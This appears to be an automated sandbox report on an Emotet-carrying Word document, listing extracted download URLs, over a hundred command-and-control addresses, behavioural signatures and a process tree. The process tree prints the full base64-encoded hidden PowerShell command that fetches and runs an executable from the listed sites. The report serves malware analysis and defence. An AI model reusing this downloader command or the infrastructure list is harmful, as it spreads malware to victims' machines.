Analysis
-
max time kernel
128s -
resource
win10v191014 -
submitted
16-12-2019 11:53
Task
task1
Sample
Docs_7f6f469f6981d4a92806d0d3b706e258.1.doc
Resource
win7v191014
General
Malware Config
Extracted
https://lilikhendarwati.com/wp-admin/JbdTQoQQ/
http://www.zhangboo.com/wp-admin/lwhcvV/
http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/
https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/
http://apolina.pl/engl/1tuh6ul-gakf89-994/
Extracted
emotet
190.38.252.45:443
105.225.77.21:80
181.167.35.84:80
164.68.115.146:8080
5.189.148.98:8080
46.105.128.215:8080
69.30.205.162:7080
190.161.67.63:80
81.82.247.216:80
72.69.99.47:80
172.90.70.168:443
91.117.31.181:80
200.71.112.158:53
51.77.113.97:8080
190.101.87.170:80
96.234.38.186:8080
190.146.14.143:443
86.70.224.211:80
88.247.26.78:80
175.103.239.50:80
187.233.220.93:443
85.235.219.74:80
87.9.181.247:80
162.144.46.90:8080
58.185.224.18:80
37.59.24.25:8080
138.197.140.163:8080
124.150.175.129:8080
82.79.244.92:80
91.117.131.122:80
185.244.167.25:443
77.245.12.212:80
220.78.29.88:80
95.255.140.89:443
124.150.175.133:80
95.216.207.86:7080
113.52.135.33:7080
177.103.240.93:80
201.196.15.79:990
192.161.190.171:8080
153.190.41.185:80
217.181.139.237:443
110.142.161.90:80
95.9.217.200:8080
189.61.200.9:443
176.58.93.123:80
128.92.54.20:80
195.250.143.182:80
181.46.176.38:80
181.47.235.26:993
192.210.217.94:8080
210.224.65.117:80
139.59.12.63:8080
203.153.216.178:7080
98.15.140.226:80
41.77.74.214:443
50.116.78.109:8080
58.93.151.148:80
78.187.204.70:80
165.100.148.200:443
210.111.160.220:80
59.158.164.66:443
163.172.97.112:8080
119.57.36.54:8080
72.27.212.209:8080
86.98.157.3:80
211.218.105.101:80
72.51.153.27:80
51.38.134.203:8080
123.142.37.165:80
212.129.14.27:8080
37.46.129.215:8080
119.159.150.176:443
95.216.212.157:8080
115.179.91.58:80
191.100.24.201:50000
190.171.135.235:80
24.28.178.71:80
200.41.121.69:443
177.103.201.23:80
174.57.150.13:8080
172.104.70.207:8080
92.16.222.156:80
86.6.123.109:80
110.2.118.164:80
82.146.55.23:7080
178.134.1.238:80
182.176.116.139:995
46.105.131.68:8080
67.254.196.78:443
67.171.182.231:80
175.127.140.68:80
216.75.37.196:8080
37.70.131.107:80
24.27.122.202:80
188.230.134.205:80
201.183.251.100:80
212.112.113.235:80
120.51.83.89:443
193.33.38.208:443
108.184.9.44:80
187.250.92.82:80
83.156.88.159:80
85.109.190.235:443
46.17.6.116:8080
78.46.87.133:8080
89.215.225.15:80
190.5.162.204:80
221.154.59.110:80
189.225.211.171:443
186.84.173.136:8080
78.186.102.195:80
192.241.220.183:8080
158.69.167.246:8080
23.253.207.142:8080
142.93.87.198:8080
100.38.11.243:80
42.51.192.231:8080
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 4268 218.exe 3748 218.exe 4880 sensorhal.exe 4892 sensorhal.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4672 Powershell.exe 4892 sensorhal.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File renamed C:\Users\Admin\218.exe => C:\Windows\SysWOW64\sensorhal.exe 218.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat sensorhal.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 sensorhal.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE sensorhal.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies sensorhal.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 sensorhal.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4672 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3748 218.exe 4892 sensorhal.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4944 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4944 WINWORD.EXE 4268 218.exe 3748 218.exe 4880 sensorhal.exe 4892 sensorhal.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4536 wrote to memory of 3756 4536 SppExtComObj.exe 75 PID 4672 wrote to memory of 4268 4672 Powershell.exe 79 PID 4268 wrote to memory of 3748 4268 218.exe 80 PID 4880 wrote to memory of 4892 4880 sensorhal.exe 84 -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4944 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7f6f469f6981d4a92806d0d3b706e258.1.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4944
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:3756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAHEAbwBqAHIAcABtAGsAZAB6AGwAZwA9ACcARwBlAHUAcwBjAGsAZgBlAGkAcwBsAGgAJwA7ACQAUwBnAHkAbgBhAGQAdABkAHoAaQAgAD0AIAAnADIAMQA4ACcAOwAkAEYAcwBuAGMAagBmAGIAbgBvAHUAdgBjAHcAPQAnAFYAcgB0AGcAdwBvAGoAaABnAHIAcQBrACcAOwAkAEkAcwB2AGUAZgB0AHMAYwB5AG0AawBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAGcAeQBuAGEAZAB0AGQAegBpACsAJwAuAGUAeABlACcAOwAkAFkAawBqAHoAbQB4AGcAeQBlAGsAcABmAD0AJwBYAGgAaABpAHYAcAB4AHQAbgAnADsAJABQAGQAegB2AGUAdgBiAGgAZQBzAD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBiAGMATABpAEUAbgBUADsAJABNAHYAYwBiAGwAcgBoAGsAegBvAHoAZwA9ACcAaAB0AHQAcABzADoALwAvAGwAaQBsAGkAawBoAGUAbgBkAGEAcgB3AGEAdABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBKAGIAZABUAFEAbwBRAFEALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB6AGgAYQBuAGcAYgBvAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGwAdwBoAGMAdgBWAC8AKgBoAHQAdABwADoALwAvAHQAZQBzAHQALgB3AGkAbgBkAHMAbwByAGgAZQBhAHQAaQBuAGcAYQBuAGQAYQBpAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHIAOQBsAHYALQA0AHQAZQBxADUAZgBmAC0AOAA3ADUAOQA4ADQANgAxADQAMAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AagBhAGMAawBpAGUAagBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AeQBpAHEAcgA0AHIANgBhAC0AZAB3AHQANwBzADAAdQAtADIANgA5ADYANQA4ADcAOAAvACoAaAB0AHQAcAA6AC8ALwBhAHAAbwBsAGkAbgBhAC4AcABsAC8AZQBuAGcAbAAvADEAdAB1AGgANgB1AGwALQBnAGEAawBmADgAOQAtADkAOQA0AC8AJwAuACIAcwBgAHAATABJAFQAIgAoACcAKgAnACkAOwAkAEoAdgBrAGgAawB0AHYAdABzAHEAagA9ACcASwBsAG0AdwBuAGkAcgByACcAOwBmAG8AcgBlAGEAYwBoACgAJABNAHoAbQBxAGIAegBqAHUAZwAgAGkAbgAgACQATQB2AGMAYgBsAHIAaABrAHoAbwB6AGcAKQB7AHQAcgB5AHsAJABQAGQAegB2AGUAdgBiAGgAZQBzAC4AIgBkAG8AYABXAG4AbABgAE8AQQBkAGYASQBMAEUAIgAoACQATQB6AG0AcQBiAHoAagB1AGcALAAgACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQA7ACQASwB5AGsAaABvAHMAeABlAD0AJwBKAGMAYwB2AHIAdQByAHQAbQB5ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQAuACIAbABFAG4AYABHAHQAaAAiACAALQBnAGUAIAAzADEANAA1ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGEAYABSAFQAIgAoACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQA7ACQARAB5AGsAZABhAGcAZQBpAHkAawByAGEAaQA9ACcARwBhAHUAbABuAGEAdABoAGoAcQAnADsAYgByAGUAYQBrADsAJABSAHgAZgBhAHAAdwBjAGcAaQBlAHAAdwA9ACcAQwBsAHMAawB2AGkAdQBmAG0AbABkAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwByAGEAbQB1AG4AbgBrAHMAawBjAGUAPQAnAEQAYgBsAHgAbgB2AHkAaABwAHkAdgB4ACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Users\Admin\218.exe"C:\Users\Admin\218.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Users\Admin\218.exe--fa4b85d73⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:3748
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
PID:4188
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4036
-
C:\Windows\SysWOW64\sensorhal.exe"C:\Windows\SysWOW64\sensorhal.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\sensorhal.exe--aec77d6f2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4892
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵PID:4760
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:524
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵PID:576